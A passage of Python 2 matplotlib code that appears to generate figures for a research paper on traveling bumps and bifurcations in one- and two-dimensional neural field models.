else:
sol = np.zeros((len(ga),3))
sol[:,0] = v1a
sol[:,1] = ga
sol[:,2] = v2a
sol = np.transpose(sol)
points = np.array([sol[0,:],sol[1,:],sol[2,:]]).T.reshape(-1,1,3)
segs = np.concatenate([points[:-1],points[1:]],axis = 1)
# shift width and colormap
#lwidths = (1.+(ga_nonan-gshift)/(.001+np.amax(ga_nonan-gshift))*lwfactor)
lwidths = np.linspace(lwstart,lwend,len(ga_nonan))
cmap = plt.get_cmap('copper')
#my_cmap = truncate_colormap(cmap,gshift/ga[-1],cmapmax)
my_cmap = truncate_colormap(cmap,cmapmin,cmapmax)
line3d = Line3DCollection(segs,linewidths=lwidths,
cmap=my_cmap,zorder=zorder)
line3d.set_array(ga_nonan)
return line3d
def clean(x,y,smallscale=False,tol=.5):
if smallscale:
tol = .5
else:
tol = tol
pos = np.where(np.abs(np.diff(y)) >= tol)[0]
pos2 = np.where(np.abs(np.diff(x)) >= tol)[0]
x[pos] = np.nan
y[pos] = np.nan
x[pos2] = np.nan
y[pos2] = np.nan
return x,y
def clean3d(x,y,z,smallscale=False,tol=.5):
if smallscale:
tol = .5
else:
tol = tol
pos = np.where(np.abs(np.diff(y)) >= tol)[0]
pos2 = np.where(np.abs(np.diff(x)) >= tol)[0]
pos3 = np.where(np.abs(np.diff(z)) >= tol)[0]
x[pos] = np.nan
y[pos] = np.nan
z[pos] = np.nan
x[pos2] = np.nan
y[pos2] = np.nan
z[pos2] = np.nan
x[pos3] = np.nan
y[pos3] = np.nan
z[pos3] = np.nan
return x,y,z
def remove_redundant(x,y,tol=.01):
pos = np.where(np.abs(np.diff(y)) < tol)[0]
pos2 = np.where(np.abs(np.diff(x)) < tol)[0]
x[pos] = np.nan
y[pos] = np.nan
x[pos2] = np.nan
y[pos2] = np.nan
return x,y
def remove_redundant_x(x,y,tol=.01):
pos = np.where(np.abs(np.diff(x)) < tol)[0]
x[pos] = np.nan
y[pos] = np.nan
return x,y
def remove_redundant_y(x,y,tol=.01):
pos2 = np.where(np.abs(np.diff(x)) < tol)[0]
x[pos2] = np.nan
y[pos2] = np.nan
return x,y
def truncate_colormap(cmap, minval=0.0, maxval=1.0, n=100):
#http://stackoverflow.com/questions/18926031/how-to-extract-a-subset-of-a-colormap-as-a-new-colormap-in-matplotlib
new_cmap = colors.LinearSegmentedColormap.from_list(
'trunc({n},{a:.2f},{b:.2f})'.format(n=cmap.name, a=minval, b=maxval),
cmap(np.linspace(minval, maxval, n)))
return new_cmap
def unlink_wrap(dat, lims=[-np.pi, np.pi], thresh = 0.95):
# http://stackoverflow.com/questions/27138751/preventing-plot-joining-when-values-wrap-in-matplotlib-plots
"""
Iterate over contiguous regions of `dat` (i.e. where it does not
jump from near one limit to the other).
This function returns an iterator object that yields slice
objects, which index the contiguous portions of `dat`.
This function implicitly assumes that all points in `dat` fall
within `lims`.
"""
jump = np.nonzero(np.abs(np.diff(dat)) > ((lims[1] - lims[0]) * thresh))[0]
lasti = 0
for ind in jump:
yield slice(lasti, ind + 1)
lasti = ind + 1
yield slice(lasti, len(dat))
def ss_bump_fig():
"""
plot steady-state bumps with arrows to bump peaks
"""
fig = plt.figure(figsize=(10,5))
ax1 = fig.add_subplot(121)
dat = oned_simple.SimDat()
ax1.set_title(r'\textbf{(a)}',x=0,y=1.02)
ax1.set_xlabel(r'$x$')
ax1.set_ylabel(r'\textbf{Activity}')
ax1.plot(dat.domain-pi,np.roll(dat.u0b(dat.domain),dat.N/2),color='black',lw=3)
# label peak 1d
ax1.scatter(0,np.amax(dat.u0b(dat.domain)),edgecolor='black',facecolor='red',s=80,zorder=3)
ax1.annotate(r'$\theta$', xy=(0, np.amax(dat.u0b(dat.domain))+.02), xycoords='data',
xytext=(0, 30), textcoords='offset points',
arrowprops=dict(arrowstyle="->")
)
# add text to peak
ax1.set_xlim(-pi,pi)
ax1.set_ylim(-1,1)
ax2 = fig.add_subplot(122, projection='3d')
dat = twod.SimDat()
ax2 = twod.plot_s(ax2,dat.u0ss)
# get/label peak 2d
idx = np.argmax(np.reshape(dat.u0ss,dat.N_idx))
peak_z = np.reshape(dat.u0ss,dat.N_idx)[idx]
peak_x = np.reshape(dat.XX,dat.N_idx)[idx]
peak_y = np.reshape(dat.YY,dat.N_idx)[idx]
#ax2.scatter(peak_x+0.,peak_y+0.,peak_z,s=80,edgecolor='black',facecolor='white',zorder=1)
ax2.plot([peak_x,peak_x],[peak_y,peak_y],[peak_z,peak_z+.01],marker='o',markersize=8,markeredgecolor='black',markerfacecolor='red',color='red',zorder=1)
# http://stackoverflow.com/questions/10374930/matplotlib-annotating-a-3d-scatter-plot
x2, y2, _ = proj3d.proj_transform(peak_x,peak_y,peak_z+.14,ax2.get_proj())
ax2.annotate(r'$(\theta_1,\theta_2)$', xy=(x2,y2), xycoords='data',
xytext=(0, 30), textcoords='offset points',
arrowprops=dict(arrowstyle="->")
)
ax2.set_title(r'\textbf{(b)}',x=0,y=1.1)
ax2.set_xlabel(r'$x$')
ax2.set_ylabel(r'$y$')
# add text to peak
plt.tight_layout()
return fig
def oned_const_vel_bump(g=3.5,total=10000):
"""
make figure for traveling bump
"""
dat = oned_simple.SimDat(g=g,q=0,zshift=.1,T=total)
# get four bumps at four equal time intervals. use second half of sim,
# use velocity to determine time intervals
# Peaks of phase plot over time are at pi.
# using second half of solution, subtract -(pi-.8*pi), find index of min
fig = plt.figure(figsize=(5,5))
ax = fig.add_subplot(111)
ax.set_xlabel(r'$x$')
ax.set_ylabel('t')
#start_idx = len(dat.t)/2.
#end_idx = int(1.5*start_idx)
total_time_idx = dat.t[-1]/dat.dt
pad = 10
start_idx = np.argmin(np.mod(dat.ph_angle[total_time_idx/2:]+pi,2*pi)-pi)+total_time_idx/2+pad/2
print start_idx
edge_travel_time = (dat.b - dat.a)/dat.c_num # time it takes to go from -pi to pi
edge_travel_idx = edge_travel_time/dat.dt-pad # total indices of travel time
wraps = 5
end_idx = start_idx+pad + wraps*(edge_travel_idx+pad)
#idx = np.arange(start_idx,end_idx+1,1,dtype='int')
cax = ax.matshow(np.roll(dat.sol[start_idx:end_idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
fig.colorbar(cax)
ax.xaxis.tick_bottom()
ax.xaxis.set_label_position('bottom')
for i in range(wraps):
start_temp = start_idx+i*edge_travel_idx + pad*i
end_temp = start_idx+(i+1)*edge_travel_idx
idx_temp = np.arange(start_temp,end_temp+1,1,dtype='int')
ax.plot(dat.ph_angle[idx_temp],np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),lw=3,color='black')
ax.plot(-(np.mod(dat.solph[idx_temp+578,0]+pi,2*pi)-pi),np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),ls='--',lw=2,color='.65')
print 'shifted oned const vel analytic by', 578, 'with dt=',dat.dt
ax.set_aspect('auto')
ax.set_xlim(-pi,pi)
ax.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax.set_xticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax.set_xticklabels(x_label)
plt.tight_layout()
return fig
def oned_nonconst_vel_bump(g=3.,q=1.,shift=-700,sign=1,total=10000):
"""
make figure for traveling bump
"""
dat = oned_simple.SimDat(g=g,q=q,zshift=.1,T=total)
# period is approx 525 time units
fig = plt.figure(figsize=(5,5))
ax = fig.add_subplot(111)
ax.set_xlabel(r'$x$')
ax.set_ylabel('t')
start_idx = len(dat.t)/2.
end_idx = int(1.5*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
cax = ax.matshow(np.roll(dat.sol[idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
fig.colorbar(cax)
ax.xaxis.tick_bottom()
ax.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
for slc in unlink_wrap(dat.ph_angle[idx]):
ax.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
for slc in unlink_wrap(modsolph):
ax.plot(modsolph[slc],timearr[slc],ls='--',color='.65',lw=2)
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print 'shifted oned_nonconst_vel_bump ana by ', shift, 'where dt=',dat.dt
ax.set_aspect('auto')
ax.set_xlim(-pi,pi)
ax.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax.set_xticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax.set_xticklabels(x_label)
"""
ax.set_title('(b)',x=-.13)
ax.set_xlabel(r'$t$')
ax.set_ylabel(r'$\theta$')
idx_beginning = int(dat.t[-1]/(1.2*dat.dt))
ax.plot(dat.t[idx_beginning:],dat.ph_angle[idx_beginning:],color='black',lw=2)
ax.plot(dat.t[idx_beginning:],-(np.mod(dat.solph[idx_beginning:,0]+pi,2*pi)-pi),color='gray',ls='--',lw=2)
"""
plt.tight_layout()
return fig
def oned_bump_combined():
"""
display all 1d traveling bump figures in one.
"""
fig = plt.figure(figsize=(10,4))
"""
oned_const_vel
#(oned_const_vel_bump,[],['oned_const_vel_bump_fig.pdf']),
"""
#########################################################################################
ax1 = fig.add_subplot(131)
dat = oned_simple.SimDat(g=3.5,q=0.,zshift=.1,T=10000,phase=True)
ax1.set_xlabel(r'$x$')
ax1.set_ylabel('$t$')
ax1.set_title(r"\textbf{(a)}",x=0)
#start_idx = len(dat.t)/2.
#end_idx = int(1.5*start_idx)
total_time_idx = dat.t[-1]/dat.dt
pad = 10
start_idx = np.argmin(np.mod(dat.ph_angle[total_time_idx/2:]+pi,2*pi)-pi)+total_time_idx/2+pad/2
print start_idx
edge_travel_time = (dat.b - dat.a)/dat.c_num # time it takes to go from -pi to pi
edge_travel_idx = edge_travel_time/dat.dt-pad # total indices of travel time
wraps = 5
end_idx = start_idx+pad + wraps*(edge_travel_idx+pad)
#idx = np.arange(start_idx,end_idx+1,1,dtype='int')
cax = ax1.matshow(np.roll(dat.sol[start_idx:end_idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax1.xaxis.tick_bottom()
ax1.xaxis.set_label_position('bottom')
for i in range(wraps):
start_temp = start_idx+i*edge_travel_idx + pad*i
end_temp = start_idx+(i+1)*edge_travel_idx
idx_temp = np.arange(start_temp,end_temp+1,1,dtype='int')
ax1.plot(dat.ph_angle[idx_temp],np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),lw=3,color='black')
ax1.plot(-(np.mod(dat.solph[idx_temp+578,0]+pi,2*pi)-pi),np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),ls='--',lw=2,color='#3399ff')
print 'shifted oned const vel analytic by', 578, 'with dt=',dat.dt
ax1.set_aspect('auto')
ax1.set_xlim(-pi,pi)
ax1.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax1.set_xticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax1.set_xticklabels(x_label)
#########################################################################################
"""
### oned_nonconst_vel1
#(oned_nonconst_vel_bump,[],['oned_nonconst_vel_bump_fig.pdf']),
"""
ax2 = fig.add_subplot(132)
dat = oned_simple.SimDat(g=3.,q=1.,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
shift = -1800
sign = 1
ax2.set_xlabel(r'$x$')
ax2.set_title(r"\textbf{(b)}",x=0)
#ax2.set_ylabel(r'$t$')
start_idx = len(dat.t)/2.
end_idx = int(1.5*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
cax = ax2.matshow(np.roll(dat.sol[idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax2.xaxis.tick_bottom()
ax2.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
for slc in unlink_wrap(dat.ph_angle[idx]):
ax2.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
for slc in unlink_wrap(modsolph):
ax2.plot(modsolph[slc],timearr[slc],ls='--',lw=2,color='#3399ff')
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print 'shifted oned_nonconst_vel_bump ana by ', shift, 'where dt=',dat.dt
ax2.set_aspect('auto')
ax2.set_xlim(-pi,pi)
ax2.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax2.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax2.set_xticklabels(x_label)
#########################################################################################
"""
### oned_nonconst_vel2
#(oned_nonconst_vel_bump,[5.5,1.,-950,-1],['oned_nonconst_vel_bump_fig2.pdf']),
"""
sign = -1
shift = -950
ax3 = fig.add_subplot(133)
dat = oned_simple.SimDat(g=5.5,q=1.,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
ax3.set_xlabel(r'$x$')
ax3.set_title(r"\textbf{(c)}",x=0)
start_idx = len(dat.t)/2.
end_idx = int(1.5*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
cax = ax3.matshow(np.roll(dat.sol[idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
fig.colorbar(cax)
ax3.xaxis.tick_bottom()
ax3.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
for slc in unlink_wrap(dat.ph_angle[idx]):
ax3.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
for slc in unlink_wrap(modsolph):
ax3.plot(modsolph[slc],timearr[slc],ls='--',lw=2,color='#3399ff')
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print 'shifted oned_nonconst_vel_bump ana by ', shift, 'where dt=',dat.dt
ax3.set_aspect('auto')
ax3.set_xlim(-pi,pi)
ax3.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax3.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax3.set_xticklabels(x_label)
#ax3.set_yticklabels([])
plt.tight_layout()
return fig
def oned_pitchfork(g0=.1,g1=2.5,N=50):
"""
get figure for 1d pitchfork bifurcation
"""
fig = plt.figure(figsize=(5,3))
ax = fig.add_subplot(111)
ax.set_xlabel(r'$g$')
ax.set_ylabel('Bump Velocity')
glist = np.linspace(g0,g1,N)
an_arr_plus = np.zeros(N) # analytic speed
num_arr_plus = np.zeros(N) # numerical speed
an_arr_minus = np.zeros(N) # analytic speed
num_arr_minus = np.zeros(N) # numerical speed
num_arr_zero = np.zeros(N)
for i,g in enumerate(glist):
dat = oned_simple.SimDat(g=g,q=0,zshift=.1)
dat2 = oned_simple.SimDat(g=g,q=0,zshift=-.1)
dat3 = oned_simple.SimDat(g=g,q=0,zshift=0.)
dat.params()
an_arr_plus[i] = dat.c_theory_eqn
an_arr_minus[i] = -dat2.c_theory_eqn
num_arr_plus[i] = dat.c_num
num_arr_minus[i] = dat2.c_num
ax.plot(glist,num_arr_plus,lw=3,color='black')
ax.plot(glist,num_arr_minus,lw=3,color='black')
ax.plot(glist,an_arr_plus,lw=2,linestyle='--',color='gray')
#ax.scatter(glist,num_arr_plus,marker='x',s=80,color='black')
ax.plot(glist,an_arr_minus,lw=2,linestyle='--',color='gray')
#ax.scatter(glist,num_arr_minus,marker='x',s=80,color='black')
ax.plot(glist,np.zeros(N),lw=2,linestyle='--',color='gray')
ax.set_xlim(g0,g1)
return fig
def oned_hopf(g0=1,g1=3.5,N=50):
"""
Get limsup of simulation
https://stackoverflow.com/questions/35149843/running-max-limsup-in-numpy-what-optimization/35150222#35150222?newreg=d630fa97367849d39f64defea1386dd2
limsup code doesn't work as expected
"""
# get index of peaks., get values of peaks. take last value.
fig = plt.figure(figsize=(5,3))
ax = fig.add_subplot(111)
ax.set_xlabel(r'$g$')
ax.set_ylabel('Oscillation Amplitude')
glist = np.linspace(g0,g1,N)
amp_num_plus = np.zeros(N) # numerical amplitude
amp_ana_plus = np.zeros(N) # analytic amplitude
amp_num_minus = np.zeros(N) # numerical amplitude
amp_ana_minus = np.zeros(N) # analytic amplitude
for i,g in enumerate(glist):
dat = oned_simple.SimDat(g=g,q=1,zshift=.1,T=20000)
dat.params()
dat.plot('phase_angle')
#plt.show()
# get peak indices
#get amplitude of last 20% of data
N_num = len(dat.ph_angle)
N_ana = len(dat.solph[:,0])
amp_num_plus[i] = np.amax(dat.ph_angle[int(.8*N_num):])
amp_ana_plus[i] = np.amax(dat.solph[:,0][int(.8*N_ana):])
amp_num_minus[i] = np.amin(dat.ph_angle[int(.8*N_num):])
amp_ana_minus[i] = np.amin(dat.solph[:,0][int(.8*N_ana):])
"""
dsol_num = np.gradient(dat.ph_angle)
dsol_ana = np.gradient(dat.solph[:,0])
peak_idx_num = np.where(np.diff(np.sign(dsol_num)))[0][-1]
peak_idx_ana = np.where(np.diff(np.sign(dsol_ana)))[0][-1]
print peak_idx_num
print peak_idx_ana
# peak values. get last peak.
amp_num[i] = dat.ph_angle[peak_idx_num]
amp_ana[i] = dat.solph[:,0][peak_idx_ana]
"""
ax.plot(glist,amp_num_plus,lw=3,color='black')
ax.plot(glist,amp_num_minus,lw=3,color='black')
#ax.scatter(glist,num_arr_plus,marker='x',s=80,color='black')
ax.plot(glist,amp_ana_plus,lw=2,linestyle='--',color='gray')
ax.plot(glist,amp_ana_minus,lw=2,linestyle='--',color='gray')
ax.set_xlim(g0,g1)
return fig
def oned_bifurcations():
"""
combined hopf and pitchfork figure functions from above
"""
fig = plt.figure(figsize=(10,4))
subtitle_shift = -.0
subtitle_shift_y = 1.05
g0=.1;g1=2.5;N=50
ax1 = fig.add_subplot(121)
ax1.set_title(r'\textbf{(a)}',x=subtitle_shift,y=subtitle_shift_y,fontsize=20)
ax1.set_xlabel(r'$g$')
ax1.set_ylabel('Bump Velocity')
glist = np.linspace(g0,g1,N)
an_arr_plus = np.zeros(N) # analytic speed
num_arr_plus = np.zeros(N) # numerical speed
an_arr_minus = np.zeros(N) # analytic speed
num_arr_minus = np.zeros(N) # numerical speed
num_arr_zero = np.zeros(N)
for i,g in enumerate(glist):
dat = oned_simple.SimDat(g=g,q=0,zshift=.1)
dat2 = oned_simple.SimDat(g=g,q=0,zshift=-.1)
dat3 = oned_simple.SimDat(g=g,q=0,zshift=0.)
dat.params()
an_arr_plus[i] = dat.c_theory_eqn
an_arr_minus[i] = -dat2.c_theory_eqn
num_arr_plus[i] = dat.c_num
num_arr_minus[i] = dat2.c_num
del dat,dat2,dat3
ax1.plot(glist,num_arr_plus,lw=3,color='black')
ax1.plot(glist,num_arr_minus,lw=3,color='black')
ax1.plot(glist,an_arr_plus,lw=2,linestyle='--',color='gray')
ax1.plot(glist,an_arr_minus,lw=2,linestyle='--',color='gray')
ax1.plot(glist,np.zeros(N),lw=2,linestyle='--',color='gray')
ax1.set_xlim(g0,g1)
g0=1;g1=3.5;N=50
ax = fig.add_subplot(122)
ax.set_title(r'\textbf{(b)}',x=subtitle_shift,y=subtitle_shift_y,fontsize=20)
ax.set_xlabel(r'$g$')
ax.set_ylabel('Oscillation Amplitude')
glist = np.linspace(g0,g1,N)
amp_num_plus = np.zeros(N) # numerical amplitude
amp_ana_plus = np.zeros(N) # analytic amplitude
amp_num_minus = np.zeros(N) # numerical amplitude
amp_ana_minus = np.zeros(N) # analytic amplitude
for i,g in enumerate(glist):
dat = oned_simple.SimDat(g=g,q=1,zshift=.1,T=20000)
dat.params()
dat.plot('phase_angle')
#plt.show()
# get peak indices
#get amplitude of last 20% of data
N_num = len(dat.ph_angle)
N_ana = len(dat.solph[:,0])
amp_num_plus[i] = np.amax(dat.ph_angle[int(.8*N_num):])
amp_ana_plus[i] = np.amax(dat.solph[:,0][int(.8*N_ana):])
amp_num_minus[i] = np.amin(dat.ph_angle[int(.8*N_num):])
amp_ana_minus[i] = np.amin(dat.solph[:,0][int(.8*N_ana):])
del dat
ax.plot(glist,amp_num_plus,lw=3,color='black')
ax.plot(glist,amp_num_minus,lw=3,color='black')
#ax.scatter(glist,num_arr_plus,marker='x',s=80,color='black')
ax.plot(glist,amp_ana_plus,lw=2,linestyle='--',color='gray')
ax.plot(glist,amp_ana_minus,lw=2,linestyle='--',color='gray')
ax.set_xlim(g0,g1)
return fig
def twod_full_fig(q=1,g=3.,zshift_angle=pi/4.,zshift_rad=.3,T=5000,factor=.5,increment=13):
"""
peak dynamics of full model
"""
print 'initial angle',zshift_angle,'inital rad',zshift_rad
#ushift1=1.;ushift2=1.
zshift1=ushift1-zshift_rad*np.cos(zshift_angle);zshift2=ushift2-zshift_rad*np.sin(zshift_angle)
ishift1=0.;ishift2=0.
ushift1=0.
ushift2=0.
#zshift1 = ushift1+.5#-.1
#zshift2 = ushift2+1.#-.1
eps = .005
dat = twod.SimDat(q=q,g=g,T=T,zshift1=zshift1,zshift2=zshift2,ushift1=ushift1,ushift2=ushift2,eps=eps)
# remove first half of sim to ignore transients
start_idx = int(dat.TN*factor)
total_idx = dat.TN - start_idx
fig = plt.figure(figsize=(5,5))
ax = fig.add_subplot(111)
arrow_idx_increment = total_idx/increment
back_idx = 2
for i in range(start_idx,dat.TN-1):
color = ((1.*total_idx - (i-start_idx))/total_idx)*.75
if i%arrow_idx_increment == 0:
ax.annotate("",
xy=(dat.th1[i], dat.th2[i]), xycoords='data',
xytext=(dat.th1[i-back_idx], dat.th2[i-back_idx]), textcoords='data',
size=22,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color=str(color)),
)
#print color
#ax.scatter(dat.th1[i],dat.th2[i],edgecolors='none',facecolors=str(color),s=(1-color)*30)
#colors = np.arange(75,0,len(dat.th1[1:-1]))
colors = np.linspace(.85,0.,len(dat.th1[start_idx:-1]))
cmap = plt.get_cmap('gray')
my_cmap = truncate_colormap(cmap,.0,.75)
#my_cmap.set_under('w')
size = (1-colors)*30
#ax.set_title('g='+str(g)+'; q='+str(q)+'; eps='+str(eps))
ax.scatter(dat.th1[start_idx:-1],dat.th2[start_idx:-1],edgecolors='none',c=colors,s=size,cmap=my_cmap)
ax.scatter(dat.th1[-1],dat.th2[-1],marker="*",color='black',s=200,facecolors='white')
ax.scatter(dat.th1[start_idx],dat.th2[start_idx],marker="o",color='black',s=50,facecolors='white')
ax.set_xlim(-pi,pi)
ax.set_ylim(-pi,pi)
ax.set_xlabel(r'$\theta_1$')
ax.set_ylabel(r'$\theta_2$')
ax.set_xticks(np.arange(-1,1+.5,.5)*pi)
ax.set_yticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
ax.set_xticklabels(x_label)
ax.set_yticklabels(x_label)
del dat
return fig
def twod_phase_fig(q=1,g=4.2,T=104,factor=.71,increment=13,phase_option='approx'):
"""
peak dynamics of phase model. full or approx.
"""
ph = twodp.Phase(q=q,x0=1,y0=.01,g=g,dde_T=T,phase_option=phase_option)
# remove first half of sim to ignore transients
start_idx = int(ph.dde_TN*factor)
total_idx = ph.dde_TN - start_idx
arrow_idx_increment = total_idx/increment
back_idx = 1
fig = plt.figure(figsize=(5,5))
ax = fig.add_subplot(111)
th1 = np.mod(ph.th1+pi,2*pi)-pi
th2 = np.mod(ph.th2+pi,2*pi)-pi
for i in range(start_idx,ph.dde_TN-1):
color = ((1.*total_idx - (i-start_idx))/total_idx)*.75
if i%arrow_idx_increment == 0:
ax.annotate("",
xy=(th1[i], th2[i]), xycoords='data',
xytext=(th1[i-back_idx], th2[i-back_idx]), textcoords='data',
size=22,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color=str(color)),
)
#print color
#ax.scatter(ph.th1[i],ph.th2[i],edgecolors='none',facecolors=str(color),s=(1-color)*30)
# for speedup consider using http://stackoverflow.com/questions/17682216/scatter-plot-and-color-mapping-in-python
colors = np.linspace(.75,0.,len(ph.th1[start_idx:-1]))
cmap = plt.get_cmap('gray')
my_cmap = truncate_colormap(cmap,.0,.75)
size = (1-colors)*30
ax.scatter(th1[start_idx:-1],th2[start_idx:-1],edgecolors='none',c=colors,s=size,cmap=my_cmap)
ax.scatter(th1[-1],th2[-1],marker="*",color='black',s=200,facecolors='white')
ax.scatter(th1[start_idx],th2[start_idx],marker="o",color='black',s=50,facecolors='white')
ax.set_xlim(-pi,pi)
ax.set_ylim(-pi,pi)
ax.set_xlabel(r'$\theta_1$')
ax.set_ylabel(r'$\theta_2$')
ax.set_xticks(np.arange(-1,1+.5,.5)*pi)
ax.set_yticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
ax.set_xticklabels(x_label)
ax.set_yticklabels(x_label)
del ph
return fig
def combined_phase_fig(option ="limit_cycle"):
"""
plot all three 2D full, 2D phase, 2D phase approx at once.
"""
r0=1.;nu0=.01
ushift1=0.
ushift2=0.
zshift_rad=.8;zshift_angle=pi/3.5
zshift1=ushift1-zshift_rad*np.cos(zshift_angle);zshift2=ushift2-zshift_rad*np.sin(zshift_angle)
ishift1=0.;ishift2=0.
#zshift1 = ushift1+.4#-.1
#zshift2 = ushift2+1.#-.1
fig = plt.figure(figsize=(15,5))
cmap = plt.get_cmap('gray')
my_cmap = truncate_colormap(cmap,.0,.75)
if option == "const":
full_q=0;full_g=3;full_T=7000
full_factor=.4;full_increment=13
ph_full_q=0;ph_full_g=2.2;ph_full_dde_T=200
ph_full_factor=.9;ph_full_increment=12
ph_approx_q=0;ph_approx_g=3;ph_approx_dde_T=100
ph_approx_factor=.8;ph_approx_increment=13
elif option == "limit_cycle":
#(twod_full_fig, [2.,5.,5000,.84,13],['twod_full_fig_q=2_g=5.pdf']),
#(twod_phase_fig,[1.,4.,300,.0,20,'full'],['twod_phase_full_fig_test']),
#(twod_phase_fig,[1.,4.,110,.956,13,'approx'],['twod_phase_approx_fig_q=1_g=4.pdf']),
full_q=2;full_g=5;full_T=5000
full_factor=.84;full_increment=13
ph_full_q=1;ph_full_g=3.;ph_full_dde_T=110
ph_full_factor=.949;ph_full_increment=7
ph_approx_q=1;ph_approx_g=3;ph_approx_dde_T=110
ph_approx_factor=.953;ph_approx_increment=6
elif option == "non_const":
#(twod_full_fig, [1.,5.,5000,.45,13],['twod_full_fig_q=1_g=5.pdf']),
#(twod_phase_fig,[1.,5.,100,.85,5,'approx'],['twod_phase_approx_fig_q=1_g=5.pdf']),
#(twod_phase_fig,[1.,5.,100,.8,12,'full'],['twod_phase_full_fig_q=1_g=5.pdf']),
full_q=1;full_g=5;full_T=5000
full_factor=.45;full_increment=13
ph_full_q=1;ph_full_g=5.;ph_full_dde_T=100
ph_full_factor=.85;ph_full_increment=5
ph_approx_q=1;ph_approx_g=5;ph_approx_dde_T=100
ph_approx_factor=.8;ph_approx_increment=12
dat = twod.SimDat(q=full_q,g=full_g,T=full_T,zshift1=zshift1,zshift2=zshift2,ushift1=ushift1,ushift2=ushift2)
ph_full = twodp.Phase(q=ph_full_q,x0=r0,y0=nu0,g=ph_full_g,dde_T=ph_full_dde_T,phase_option='full')
ph_approx = twodp.Phase(q=ph_approx_q,x0=r0,y0=nu0,g=ph_approx_g,dde_T=ph_approx_dde_T,phase_option='approx')
subtitle_shift = -.0
subtitle_shift_y = 1.05
## Plot full
ax1 = fig.add_subplot(131)
ax1.set_title(r"\textbf{(a)}",x=subtitle_shift,y=subtitle_shift_y,fontsize=20)
# remove first half of sim to ignore transients
start_idx = int(dat.TN*full_factor)
total_idx = dat.TN - start_idx
arrow_idx_increment = total_idx/full_increment
back_idx = 2
for i in range(start_idx,dat.TN-1):
color = ((1.*total_idx - (i-start_idx))/total_idx)*.75
if i%arrow_idx_increment == 0:
ax1.annotate("",
xy=(dat.th1[i], dat.th2[i]), xycoords='data',
